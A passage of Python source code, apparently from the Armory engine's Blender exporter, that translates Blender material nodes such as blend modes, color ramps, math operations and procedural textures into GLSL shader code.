out_col = 'mix({0}, {0} - {1}, {2})'.format(col1, col2, fac_var)
elif blend == 'SCREEN':
out_col = '(vec3(1.0) - (vec3(1.0 - {2}) + {2} * (vec3(1.0) - {1})) * (vec3(1.0) - {0}))'.format(col1, col2, fac_var)
elif blend == 'DIVIDE':
out_col = '(vec3((1.0 - {2}) * {0} + {2} * {0} / {1}))'.format(col1, col2, fac_var)
elif blend == 'DIFFERENCE':
out_col = 'mix({0}, abs({0} - {1}), {2})'.format(col1, col2, fac_var)
elif blend == 'DARKEN':
out_col = 'min({0}, {1} * {2})'.format(col1, col2, fac_var)
elif blend == 'LIGHTEN':
out_col = 'max({0}, {1} * {2})'.format(col1, col2, fac_var)
elif blend == 'OVERLAY':
out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix
elif blend == 'DODGE':
out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix
elif blend == 'BURN':
out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix
elif blend == 'HUE':
out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix
elif blend == 'SATURATION':
out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix
elif blend == 'VALUE':
out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix
elif blend == 'COLOR':
out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix
elif blend == 'SOFT_LIGHT':
out_col = '((1.0 - {2}) * {0} + {2} * ((vec3(1.0) - {0}) * {1} * {0} + {0} * (vec3(1.0) - (vec3(1.0) - {1}) * (vec3(1.0) - {0}))));'.format(col1, col2, fac)
elif blend == 'LINEAR_LIGHT':
out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix
# out_col = '({0} + {2} * (2.0 * ({1} - vec3(0.5))))'.format(col1, col2, fac_var)
if node.use_clamp:
return 'clamp({0}, vec3(0.0), vec3(1.0))'.format(out_col)
else:
return out_col
elif node.type == 'BLACKBODY':
t = float(parse_value_input(node.inputs[0]))
rgb = [0,0,0]
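        # Piecewise fit of the blackbody emission colour, evaluated at export
        # time so only a constant colour reaches the shader: in each
        # temperature band r and g follow c0/t + c1*t + c2, and b is a cubic
        # polynomial in t.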
blackbody_table_r = [
[2.52432244e+03, -1.06185848e-03, 3.11067539e+00],
[3.37763626e+03, -4.34581697e-04, 1.64843306e+00],
[4.10671449e+03, -8.61949938e-05, 6.41423749e-01],
[4.66849800e+03, 2.85655028e-05, 1.29075375e-01],
[4.60124770e+03, 2.89727618e-05, 1.48001316e-01],
[3.78765709e+03, 9.36026367e-06, 3.98995841e-01]
]
blackbody_table_g = [
[-7.50343014e+02, 3.15679613e-04, 4.73464526e-01],
[-1.00402363e+03, 1.29189794e-04, 9.08181524e-01],
[-1.22075471e+03, 2.56245413e-05, 1.20753416e+00],
[-1.42546105e+03, -4.01730887e-05, 1.44002695e+00],
[-1.18134453e+03, -2.18913373e-05, 1.30656109e+00],
[-5.00279505e+02, -4.59745390e-06, 1.09090465e+00]
]
blackbody_table_b = [
[0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0],
[-2.02524603e-11, 1.79435860e-07, -2.60561875e-04, -1.41761141e-02],
[-2.22463426e-13, -1.55078698e-08, 3.81675160e-04, -7.30646033e-01],
[6.72595954e-13, -2.73059993e-08, 4.24068546e-04, -7.52204323e-01]
]
if (t >= 12000):
rgb[0] = 0.826270103
rgb[1] = 0.994478524
rgb[2] = 1.56626022
elif (t < 965.0):
rgb[0] = 4.70366907
rgb[1] = 0.0
rgb[2] = 0.0
else:
if (t >= 6365.0):
i = 5
elif(t >= 3315.0):
i = 4
elif(t >= 1902.0):
i = 3
elif(t >= 1449.0):
i = 2
elif(t >= 1167.0):
i = 1
else:
i = 0
r = blackbody_table_r[i]
g = blackbody_table_g[i]
b = blackbody_table_b[i]
t_inv = 1.0 / t
rgb[0] = r[0] * t_inv + r[1] * t + r[2]
rgb[1] = g[0] * t_inv + g[1] * t + g[2]
rgb[2] = ((b[0] * t + b[1]) * t + b[2]) * t + b[3]
# Pass constant
return to_vec3([rgb[0], rgb[1], rgb[2]])
elif node.type == 'VALTORGB': # ColorRamp
fac = parse_value_input(node.inputs[0])
interp = node.color_ramp.interpolation
elems = node.color_ramp.elements
if len(elems) == 1:
return to_vec3(elems[0].color)
# Write cols array
cols_var = node_name(node.name) + '_cols'
curshader.write('vec3 {0}[{1}];'.format(cols_var, len(elems))) # TODO: Make const
for i in range(0, len(elems)):
curshader.write('{0}[{1}] = vec3({2}, {3}, {4});'.format(cols_var, i, elems[i].color[0], elems[i].color[1], elems[i].color[2]))
# Get index
fac_var = node_name(node.name) + '_fac'
curshader.write('float {0} = {1};'.format(fac_var, fac))
index = '0'
for i in range(1, len(elems)):
index += ' + ({0} > {1} ? 1 : 0)'.format(fac_var, elems[i].position)
# Write index
index_var = node_name(node.name) + '_i'
curshader.write('int {0} = {1};'.format(index_var, index))
if interp == 'CONSTANT':
return '{0}[{1}]'.format(cols_var, index_var)
else: # Linear
# Write facs array
facs_var = node_name(node.name) + '_facs'
curshader.write('float {0}[{1}];'.format(facs_var, len(elems))) # TODO: Make const
for i in range(0, len(elems)):
curshader.write('{0}[{1}] = {2};'.format(facs_var, i, elems[i].position))
# Mix color
# float f = (pos - start) * (1.0 / (finish - start))
return 'mix({0}[{1}], {0}[{1} + 1], ({2} - {3}[{1}]) * (1.0 / ({3}[{1} + 1] - {3}[{1}]) ))'.format(cols_var, index_var, fac_var, facs_var)
elif node.type == 'CURVE_VEC': # Vector Curves
fac = parse_value_input(node.inputs[0])
vec = parse_vector_input(node.inputs[1])
curves = node.mapping.curves
name = node_name(node.name)
# mapping.curves[0].points[0].handle_type # bezier curve
return '(vec3({0}, {1}, {2}) * {3})'.format(\
vector_curve(name + '0', vec + '.x', curves[0].points), vector_curve(name + '1', vec + '.y', curves[1].points), vector_curve(name + '2', vec + '.z', curves[2].points), fac)
elif node.type == 'CURVE_RGB': # RGB Curves
fac = parse_value_input(node.inputs[0])
vec = parse_vector_input(node.inputs[1])
curves = node.mapping.curves
name = node_name(node.name)
# mapping.curves[0].points[0].handle_type
return '(sqrt(vec3({0}, {1}, {2}) * vec3({4}, {5}, {6})) * {3})'.format(\
vector_curve(name + '0', vec + '.x', curves[0].points), vector_curve(name + '1', vec + '.y', curves[1].points), vector_curve(name + '2', vec + '.z', curves[2].points), fac,\
vector_curve(name + '3a', vec + '.x', curves[3].points), vector_curve(name + '3b', vec + '.y', curves[3].points), vector_curve(name + '3c', vec + '.z', curves[3].points))
elif node.type == 'COMBHSV':
curshader.add_function(c_functions.str_hue_sat)
h = parse_value_input(node.inputs[0])
s = parse_value_input(node.inputs[1])
v = parse_value_input(node.inputs[2])
return 'hsv_to_rgb(vec3({0}, {1}, {2}))'.format(h,s,v)
elif node.type == 'COMBRGB':
r = parse_value_input(node.inputs[0])
g = parse_value_input(node.inputs[1])
b = parse_value_input(node.inputs[2])
return 'vec3({0}, {1}, {2})'.format(r, g, b)
elif node.type == 'WAVELENGTH':
curshader.add_function(c_functions.str_wavelength_to_rgb)
wl = parse_value_input(node.inputs[0])
# Roughly map to cycles - 450 to 600 nanometers
return 'wavelength_to_rgb(({0} - 450.0) / 150.0)'.format(wl)
# Vector
elif node.type == 'CAMERA':
# View Vector in camera space
return 'vVecCam'
elif node.type == 'NEW_GEOMETRY':
if socket == node.outputs[0]: # Position
return 'wposition'
elif socket == node.outputs[1]: # Normal
return 'n' if curshader.shader_type == 'frag' else 'wnormal'
elif socket == node.outputs[2]: # Tangent
return 'wtangent'
elif socket == node.outputs[3]: # True Normal
return 'n' if curshader.shader_type == 'frag' else 'wnormal'
elif socket == node.outputs[4]: # Incoming
return 'vVec'
elif socket == node.outputs[5]: # Parametric
return 'mposition'
elif node.type == 'HAIR_INFO':
return 'vec3(0.0)' # Tangent Normal
elif node.type == 'OBJECT_INFO':
return 'wposition'
elif node.type == 'PARTICLE_INFO':
if socket == node.outputs[3]: # Location
particle_info['location'] = True
return 'p_location' if arm.utils.get_rp().arm_particles == 'On' else 'vec3(0.0)'
elif socket == node.outputs[5]: # Velocity
particle_info['velocity'] = True
return 'p_velocity' if arm.utils.get_rp().arm_particles == 'On' else 'vec3(0.0)'
elif socket == node.outputs[6]: # Angular Velocity
particle_info['angular_velocity'] = True
return 'vec3(0.0)'
elif node.type == 'TANGENT':
return 'wtangent'
elif node.type == 'TEX_COORD':
#obj = node.object
#instance = node.from_instance
if socket == node.outputs[0]: # Generated - bounds
return 'bposition'
elif socket == node.outputs[1]: # Normal
return 'n'
elif socket == node.outputs[2]: # UV
con.add_elem('tex', 'short2norm')
return 'vec3(texCoord.x, 1.0 - texCoord.y, 0.0)'
elif socket == node.outputs[3]: # Object
return 'mposition'
elif socket == node.outputs[4]: # Camera
return 'vec3(0.0)' # 'vposition'
elif socket == node.outputs[5]: # Window
return 'vec3(0.0)' # 'wvpposition'
elif socket == node.outputs[6]: # Reflection
return 'vec3(0.0)'
elif node.type == 'UVMAP':
#instance = node.from_instance
con.add_elem('tex', 'short2norm')
mat = mat_get_material()
mat_users = mat_get_material_users()
if mat_users != None and mat in mat_users:
mat_user = mat_users[mat][0]
if hasattr(mat_user.data, 'uv_layers'):
lays = mat_user.data.uv_layers
# Second uvmap referenced
if len(lays) > 1 and node.uv_map == lays[1].name:
con.add_elem('tex1', 'short2norm')
return 'vec3(texCoord1.x, 1.0 - texCoord1.y, 0.0)'
return 'vec3(texCoord.x, 1.0 - texCoord.y, 0.0)'
elif node.type == 'BUMP':
# Interpolation strength
strength = parse_value_input(node.inputs[0])
# Height multiplier
# distance = parse_value_input(node.inputs[1])
sample_bump = True
height = parse_value_input(node.inputs[2])
sample_bump = False
nor = parse_vector_input(node.inputs[3])
if sample_bump_res != '':
if node.invert:
ext = ['1', '2', '3', '4']
else:
ext = ['2', '1', '4', '3']
curshader.write('float {0}_fh1 = {0}_{1} - {0}_{2}; float {0}_fh2 = {0}_{3} - {0}_{4};'.format(sample_bump_res, ext[0], ext[1], ext[2], ext[3]))
curshader.write('{0}_fh1 *= ({1}) * 3.0; {0}_fh2 *= ({1}) * 3.0;'.format(sample_bump_res, strength))
curshader.write('vec3 {0}_a = normalize(vec3(2.0, 0.0, {0}_fh1));'.format(sample_bump_res))
curshader.write('vec3 {0}_b = normalize(vec3(0.0, 2.0, {0}_fh2));'.format(sample_bump_res))
res = 'normalize(mat3({0}_a, {0}_b, normalize(vec3({0}_fh1, {0}_fh2, 2.0))) * n)'.format(sample_bump_res)
sample_bump_res = ''
else:
res = 'n'
return res
elif node.type == 'MAPPING':
out = parse_vector_input(node.inputs[0])
scale = node.inputs['Scale'].default_value
rotation = node.inputs['Rotation'].default_value
location = node.inputs['Location'].default_value if node.inputs['Location'].enabled else [0.0, 0.0, 0.0]
if scale[0] != 1.0 or scale[1] != 1.0 or scale[2] != 1.0:
out = '({0} * vec3({1}, {2}, {3}))'.format(out, scale[0], scale[1], scale[2])
if rotation[2] != 0.0:
# ZYX rotation, Z axis for now..
a = rotation[2]
# x * cos(theta) - y * sin(theta)
# x * sin(theta) + y * cos(theta)
out = 'vec3({0}.x * {1} - ({0}.y) * {2}, {0}.x * {2} + ({0}.y) * {1}, 0.0)'.format(out, math.cos(a), math.sin(a))
# if node.rotation[1] != 0.0:
# a = node.rotation[1]
# out = 'vec3({0}.x * {1} - {0}.z * {2}, {0}.x * {2} + {0}.z * {1}, 0.0)'.format(out, math.cos(a), math.sin(a))
# if node.rotation[0] != 0.0:
# a = node.rotation[0]
# out = 'vec3({0}.y * {1} - {0}.z * {2}, {0}.y * {2} + {0}.z * {1}, 0.0)'.format(out, math.cos(a), math.sin(a))
if location[0] != 0.0 or location[1] != 0.0 or location[2] != 0.0:
out = '({0} + vec3({1}, {2}, {3}))'.format(out, location[0], location[1], location[2])
# use Extension parameter from the Texture node instead
# if node.use_min:
# out = 'max({0}, vec3({1}, {2}, {3}))'.format(out, node.min[0], node.min[1])
# if node.use_max:
# out = 'min({0}, vec3({1}, {2}, {3}))'.format(out, node.max[0], node.max[1])
return out
elif node.type == 'NORMAL':
if socket == node.outputs[0]:
return to_vec3(node.outputs[0].default_value)
elif socket == node.outputs[1]: # TODO: is parse_value path preferred?
nor = parse_vector_input(node.inputs[0])
return 'vec3(dot({0}, {1}))'.format(to_vec3(node.outputs[0].default_value), nor)
elif node.type == 'NORMAL_MAP':
if curshader == tese:
return parse_vector_input(node.inputs[1])
else:
#space = node.space
#map = node.uv_map
# Color
parse_normal_map_color_input(node.inputs[1], node.inputs[0])
return None
elif node.type == 'VECT_TRANSFORM':
#type = node.vector_type
#conv_from = node.convert_from
#conv_to = node.convert_to
# Pass throuh
return parse_vector_input(node.inputs[0])
elif node.type == 'COMBXYZ':
x = parse_value_input(node.inputs[0])
y = parse_value_input(node.inputs[1])
z = parse_value_input(node.inputs[2])
return 'vec3({0}, {1}, {2})'.format(x, y, z)
elif node.type == 'VECT_MATH':
vec1 = parse_vector_input(node.inputs[0])
vec2 = parse_vector_input(node.inputs[1])
op = node.operation
if op == 'ADD':
return '({0} + {1})'.format(vec1, vec2)
elif op == 'SUBTRACT':
return '({0} - {1})'.format(vec1, vec2)
elif op == 'AVERAGE':
return '(({0} + {1}) / 2.0)'.format(vec1, vec2)
elif op == 'DOT_PRODUCT':
return 'vec3(dot({0}, {1}))'.format(vec1, vec2)
elif op == 'CROSS_PRODUCT':
return 'cross({0}, {1})'.format(vec1, vec2)
elif op == 'NORMALIZE':
return 'normalize({0})'.format(vec1)
elif node.type == 'DISPLACEMENT':
height = parse_value_input(node.inputs[0])
midlevel = parse_value_input(node.inputs[1])
scale = parse_value_input(node.inputs[2])
nor = parse_vector_input(node.inputs[3])
return '(vec3({0}) * {1})'.format(height, scale)
def parse_normal_map_color_input(inp, strength_input=None):
global normal_parsed
global frag
if basecol_only:
return
if inp.is_linked == False:
return
if normal_parsed:
return
normal_parsed = True
frag.write_normal += 1
if not get_arm_export_tangents() or mat_get_material().arm_decal: # Compute TBN matrix
frag.write('vec3 texn = ({0}) * 2.0 - 1.0;'.format(parse_vector_input(inp)))
frag.write('texn.y = -texn.y;')
frag.add_include('std/normals.glsl')
frag.write('mat3 TBN = cotangentFrame(n, -vVec, texCoord);')
frag.write('n = TBN * normalize(texn);')
else:
frag.write('vec3 n = ({0}) * 2.0 - 1.0;'.format(parse_vector_input(inp)))
if strength_input != None:
strength = parse_value_input(strength_input)
if strength != '1.0':
frag.write('n.xy *= {0};'.format(strength))
frag.write('n = normalize(TBN * n);')
con.add_elem('tang', 'short4norm')
frag.write_normal -= 1
def parse_value_input(inp):
if inp.is_linked:
l = inp.links[0]
if l.from_node.type == 'REROUTE':
return parse_value_input(l.from_node.inputs[0])
res_var = write_result(l)
st = l.from_socket.type
if st == 'RGB' or st == 'RGBA' or st == 'VECTOR':
return '{0}.x'.format(res_var)
else: # VALUE
return res_var
else:
if mat_batch() and inp.is_uniform:
return to_uniform(inp)
else:
return to_vec1(inp.default_value)
def parse_value(node, socket):
global particle_info
global sample_bump
if node.type == 'GROUP':
if node.node_tree.name.startswith('Armory PBR'):
# Displacement
if socket == node.outputs[1]:
return parse_value_input(node.inputs[7])
else:
return None
else:
return parse_group(node, socket)
elif node.type == 'GROUP_INPUT':
return parse_group_input(node, socket)
elif node.type == 'ATTRIBUTE':
# Pass time till drivers are implemented
if node.attribute_name == 'time':
curshader.add_uniform('float time', link='_time')
return 'time'
else:
return '0.0'
elif node.type == 'CAMERA':
# View Z Depth
if socket == node.outputs[1]:
curshader.add_include('std/math.glsl')
curshader.add_uniform('vec2 cameraProj', link='_cameraPlaneProj')
return 'linearize(gl_FragCoord.z, cameraProj)'
# View Distance
else:
curshader.add_uniform('vec3 eye', link='_cameraPosition')
return 'distance(eye, wposition)'
elif node.type == 'FRESNEL':
curshader.add_function(c_functions.str_fresnel)
ior = parse_value_input(node.inputs[0])
if node.inputs[1].is_linked:
dotnv = 'dot({0}, vVec)'.format(parse_vector_input(node.inputs[1]))
else:
dotnv = 'dotNV'
return 'fresnel({0}, {1})'.format(ior, dotnv)
elif node.type == 'NEW_GEOMETRY':
if socket == node.outputs[6]: # Backfacing
return '(1.0 - float(gl_FrontFacing))'
elif socket == node.outputs[7]: # Pointiness
return '0.0'
elif node.type == 'HAIR_INFO':
# Is Strand
# Intercept
# Thickness
return '0.5'
elif node.type == 'LAYER_WEIGHT':
blend = parse_value_input(node.inputs[0])
if node.inputs[1].is_linked:
dotnv = 'dot({0}, vVec)'.format(parse_vector_input(node.inputs[1]))
else:
dotnv = 'dotNV'
if socket == node.outputs[0]: # Fresnel
curshader.add_function(c_functions.str_fresnel)
return 'fresnel(1.0 / (1.0 - {0}), {1})'.format(blend, dotnv)
elif socket == node.outputs[1]: # Facing
return '(1.0 - pow({0}, ({1} < 0.5) ? 2.0 * {1} : 0.5 / (1.0 - {1})))'.format(dotnv, blend)
elif node.type == 'LIGHT_PATH':
if socket == node.outputs[0]: # Is Camera Ray
return '1.0'
elif socket == node.outputs[1]: # Is Shadow Ray
return '0.0'
elif socket == node.outputs[2]: # Is Diffuse Ray
return '1.0'
elif socket == node.outputs[3]: # Is Glossy Ray
return '1.0'
elif socket == node.outputs[4]: # Is Singular Ray
return '0.0'
elif socket == node.outputs[5]: # Is Reflection Ray
return '0.0'
elif socket == node.outputs[6]: # Is Transmission Ray
return '0.0'
elif socket == node.outputs[7]: # Ray Length
return '0.0'
elif socket == node.outputs[8]: # Ray Depth
return '0.0'
elif socket == node.outputs[9]: # Transparent Depth
return '0.0'
elif socket == node.outputs[10]: # Transmission Depth
return '0.0'
elif node.type == 'OBJECT_INFO':
if socket == node.outputs[2]: # Object Index
curshader.add_uniform('float objectInfoIndex', link='_objectInfoIndex')
return 'objectInfoIndex'
elif socket == node.outputs[3]: # Material Index
curshader.add_uniform('float objectInfoMaterialIndex', link='_objectInfoMaterialIndex')
return 'objectInfoMaterialIndex'
elif socket == node.outputs[4]: # Random
curshader.add_uniform('float objectInfoRandom', link='_objectInfoRandom')
return 'objectInfoRandom'
elif node.type == 'PARTICLE_INFO':
if socket == node.outputs[0]: # Index
particle_info['index'] = True
return 'p_index' if arm.utils.get_rp().arm_particles == 'On' else '0.0'
elif socket == node.outputs[1]: # Age
particle_info['age'] = True
return 'p_age' if arm.utils.get_rp().arm_particles == 'On' else '0.0'
elif socket == node.outputs[2]: # Lifetime
particle_info['lifetime'] = True
return 'p_lifetime' if arm.utils.get_rp().arm_particles == 'On' else '0.0'
elif socket == node.outputs[4]: # Size
particle_info['size'] = True
return '1.0'
elif node.type == 'VALUE':
if node.arm_material_param:
nn = 'param_' + node_name(node.name)
curshader.add_uniform('float {0}'.format(nn), link='{0}'.format(node.name))
return nn
else:
return to_vec1(node.outputs[0].default_value)
elif node.type == 'WIREFRAME':
#node.use_pixel_size
# size = parse_value_input(node.inputs[0])
return '0.0'
elif node.type == 'TEX_BRICK':
curshader.add_function(c_functions.str_tex_brick)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[4])
res = 'tex_brick_f({0} * {1})'.format(co, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_CHECKER':
curshader.add_function(c_functions.str_tex_checker)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[3])
res = 'tex_checker_f({0}, {1})'.format(co, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_GRADIENT':
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
grad = node.gradient_type
if grad == 'LINEAR':
f = '{0}.x'.format(co)
elif grad == 'QUADRATIC':
f = '0.0'
elif grad == 'EASING':
f = '0.0'
elif grad == 'DIAGONAL':
f = '({0}.x + {0}.y) * 0.5'.format(co)
elif grad == 'RADIAL':
f = 'atan({0}.y, {0}.x) / PI2 + 0.5'.format(co)
elif grad == 'QUADRATIC_SPHERE':
f = '0.0'
elif grad == 'SPHERICAL':
f = 'max(1.0 - sqrt({0}.x * {0}.x + {0}.y * {0}.y + {0}.z * {0}.z), 0.0)'.format(co)
res = '(clamp({0}, 0.0, 1.0))'.format(f)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_IMAGE':
# Already fetched
if is_parsed(store_var_name(node)):
return '{0}.a'.format(store_var_name(node))
tex_name = safesrc(node.name)
tex = make_texture(node, tex_name)
tex_link = node.name if node.arm_material_param else None
if tex != None:
curshader.write_textures += 1
res = '{0}.a'.format(texture_store(node, tex, tex_name, tex_link=tex_link))
curshader.write_textures -= 1
return res
elif node.image == None: # Empty texture
tex = {}
tex['name'] = tex_name
tex['file'] = ''
return '{0}.a'.format(texture_store(node, tex, tex_name, True, tex_link=tex_link))
else:
tex_store = store_var_name(node) # Pink color for missing texture
curshader.write('vec4 {0} = vec4(1.0, 0.0, 1.0, 1.0);'.format(tex_store))
return '{0}.a'.format(tex_store)
elif node.type == 'TEX_MAGIC':
curshader.add_function(c_functions.str_tex_magic)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
res = 'tex_magic_f({0} * {1} * 4.0)'.format(co, scale)
if sample_bump:
write_bump(node, res, 0.1)
return res
elif node.type == 'TEX_MUSGRAVE':
# Fall back to noise
curshader.add_function(c_functions.str_tex_musgrave)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
# detail = parse_value_input(node.inputs[2])
# distortion = parse_value_input(node.inputs[3])
res = 'tex_musgrave_f({0} * {1} * 0.5)'.format(co, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_NOISE':
curshader.add_function(c_functions.str_tex_noise)
assets_add(get_sdk_path() + '/armory/Assets/' + 'noise256.png')
assets_add_embedded_data('noise256.png')
curshader.add_uniform('sampler2D snoise256', link='$noise256.png')
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
# detail = parse_value_input(node.inputs[2])
# distortion = parse_value_input(node.inputs[3])
res = 'tex_noise({0} * {1})'.format(co, scale)
if sample_bump:
write_bump(node, res, 0.1)
return res
elif node.type == 'TEX_POINTDENSITY':
return '0.0'
elif node.type == 'TEX_VORONOI':
curshader.add_function(c_functions.str_tex_voronoi)
assets_add(get_sdk_path() + '/armory/Assets/' + 'noise256.png')
assets_add_embedded_data('noise256.png')
curshader.add_uniform('sampler2D snoise256', link='$noise256.png')
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
if node.coloring == 'INTENSITY':
res = 'tex_voronoi({0} * {1}).a'.format(co, scale)
else: # CELLS
res = 'tex_voronoi({0} * {1}).r'.format(co, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_WAVE':
curshader.add_function(c_functions.str_tex_wave)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
res = 'tex_wave_f({0} * {1})'.format(co, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'LIGHT_FALLOFF':
# Constant, linear, quadratic
# Shaders default to quadratic for now
return '1.0'
elif node.type == 'NORMAL':
nor = parse_vector_input(node.inputs[0])
return 'dot({0}, {1})'.format(to_vec3(node.outputs[0].default_value), nor)
elif node.type == 'VALTORGB': # ColorRamp
return '1.0'
elif node.type == 'MATH':
val1 = parse_value_input(node.inputs[0])
val2 = parse_value_input(node.inputs[1])
op = node.operation
if op == 'ADD':
out_val = '({0} + {1})'.format(val1, val2)
elif op == 'SUBTRACT':
out_val = '({0} - {1})'.format(val1, val2)
elif op == 'MULTIPLY':
out_val = '({0} * {1})'.format(val1, val2)
elif op == 'DIVIDE':
out_val = '({0} / {1})'.format(val1, val2)
elif op == 'POWER':
out_val = 'pow({0}, {1})'.format(val1, val2)
elif op == 'LOGARITHM':
out_val = 'log({0})'.format(val1)
elif op == 'SQRT':
out_val = 'sqrt({0})'.format(val1)
elif op == 'ABSOLUTE':
out_val = 'abs({0})'.format(val1)
elif op == 'MINIMUM':
out_val = 'min({0}, {1})'.format(val1, val2)
elif op == 'MAXIMUM':
out_val = 'max({0}, {1})'.format(val1, val2)
elif op == 'LESS_THAN':
out_val = 'float({0} < {1})'.format(val1, val2)
elif op == 'GREATER_THAN':
out_val = 'float({0} > {1})'.format(val1, val2)
elif op == 'ROUND':
# out_val = 'round({0})'.format(val1)
out_val = 'floor({0} + 0.5)'.format(val1)
elif op == 'FLOOR':
out_val = 'floor({0})'.format(val1)
elif op == 'CEIL':
out_val = 'ceil({0})'.format(val1)
elif op == 'FRACT':
out_val = 'fract({0})'.format(val1)
elif op == 'MODULO':
# out_val = 'float({0} % {1})'.format(val1, val2)
out_val = 'mod({0}, {1})'.format(val1, val2)
elif op == 'SINE':
out_val = 'sin({0})'.format(val1)
elif op == 'COSINE':
out_val = 'cos({0})'.format(val1)
elif op == 'TANGENT':
out_val = 'tan({0})'.format(val1)
elif op == 'ARCSINE':
out_val = 'asin({0})'.format(val1)
elif op == 'ARCCOSINE':
out_val = 'acos({0})'.format(val1)
elif op == 'ARCTANGENT':
out_val = 'atan({0})'.format(val1)
elif op == 'ARCTAN2':
out_val = 'atan({0}, {1})'.format(val1, val2)
if node.use_clamp:
return 'clamp({0}, 0.0, 1.0)'.format(out_val)
else:
return out_val
elif node.type == 'RGBTOBW':
col = parse_vector_input(node.inputs[0])
return '((({0}.r * 0.3 + {0}.g * 0.59 + {0}.b * 0.11) / 3.0) * 2.5)'.format(col)
elif node.type == 'SEPHSV':
return '0.0'
elif node.type == 'SEPRGB':
col = parse_vector_input(node.inputs[0])
if socket == node.outputs[0]:
return '{0}.r'.format(col)
elif socket == node.outputs[1]:
return '{0}.g'.format(col)
elif socket == node.outputs[2]:
return '{0}.b'.format(col)
elif node.type == 'SEPXYZ':
vec = parse_vector_input(node.inputs[0])
if socket == node.outputs[0]:
return '{0}.x'.format(vec)
elif socket == node.outputs[1]:
return '{0}.y'.format(vec)
elif socket == node.outputs[2]:
return '{0}.z'.format(vec)
elif node.type == 'VECT_MATH':
vec1 = parse_vector_input(node.inputs[0])
vec2 = parse_vector_input(node.inputs[1])
op = node.operation
if op == 'DOT_PRODUCT':
return 'dot({0}, {1})'.format(vec1, vec2)
else:
return '0.0'
##
def vector_curve(name, fac, points):
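        # Emits GLSL that linearly interpolates a curve defined by `points`:
        # two constant arrays hold the control points' X/Y locations, an index is
        # chosen by counting how many X values `fac` has already passed, and the
        # returned expression mix()es between the two neighbouring Y values.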
# Write Ys array
ys_var = name + '_ys'
curshader.write('float {0}[{1}];'.format(ys_var, len(points))) # TODO: Make const
for i in range(0, len(points)):
curshader.write('{0}[{1}] = {2};'.format(ys_var, i, points[i].location[1]))
# Get index
fac_var = name + '_fac'
curshader.write('float {0} = {1};'.format(fac_var, fac))
index = '0'
for i in range(1, len(points)):
index += ' + ({0} > {1} ? 1 : 0)'.format(fac_var, points[i].location[0])
# Write index
index_var = name + '_i'
curshader.write('int {0} = {1};'.format(index_var, index))
# Linear
# Write Xs array
facs_var = name + '_xs'
curshader.write('float {0}[{1}];'.format(facs_var, len(points))) # TODO: Make const
for i in range(0, len(points)):
curshader.write('{0}[{1}] = {2};'.format(facs_var, i, points[i].location[0]))
# Map vector
return 'mix({0}[{1}], {0}[{1} + 1], ({2} - {3}[{1}]) * (1.0 / ({3}[{1} + 1] - {3}[{1}]) ))'.format(ys_var, index_var, fac_var, facs_var)
def write_normal(inp):
if inp.is_linked and inp.links[0].from_node.type != 'GROUP_INPUT':
normal_res = parse_vector_input(inp)
if normal_res != None:
curshader.write('n = {0};'.format(normal_res))
def is_parsed(s):
global parsed
return s in parsed
def res_var_name(node, socket):
return node_name(node.name) + '_' + safesrc(socket.name) + '_res'
def write_result(l):
global parsed
res_var = res_var_name(l.from_node, l.from_socket)
# Unparsed node
if not is_parsed(res_var):
parsed[res_var] = True
st = l.from_socket.type
if st == 'RGB' or st == 'RGBA' or st == 'VECTOR':
res = parse_vector(l.from_node, l.from_socket)
if res == None:
return None
curshader.write('vec3 {0} = {1};'.format(res_var, res))
elif st == 'VALUE':
res = parse_value(l.from_node, l.from_socket)
if res == None:
return None
curshader.write('float {0} = {1};'.format(res_var, res))
# Normal map already parsed, return
elif l.from_node.type == 'NORMAL_MAP':
return None
return res_var
def glsl_type(t):
if t == 'RGB' or t == 'RGBA' or t == 'VECTOR':
return 'vec3'
else:
return 'float'
def to_uniform(inp):
uname = safesrc(inp.node.name) + safesrc(inp.name)
curshader.add_uniform(glsl_type(inp.type) + ' ' + uname)
return uname
def store_var_name(node):
return node_name(node.name) + '_store'
def texture_store(node, tex, tex_name, to_linear=False, tex_link=None):
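        # Samples the image texture once and caches the result: binds the texture,
        # declares its sampler uniform, builds the UV (or triplanar) lookup and,
        # while bump sampling is active, also fetches four offset taps for gradients.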
global sample_bump
global sample_bump_res
global parsed
tex_store = store_var_name(node)
if is_parsed(tex_store):
return tex_store
parsed[tex_store] = True
mat_bind_texture(tex)
con.add_elem('tex', 'short2norm')
curshader.add_uniform('sampler2D {0}'.format(tex_name), link=tex_link)
if node.inputs[0].is_linked:
uv_name = parse_vector_input(node.inputs[0])
uv_name = 'vec2({0}.x, 1.0 - {0}.y)'.format(uv_name)
else:
uv_name = 'texCoord'
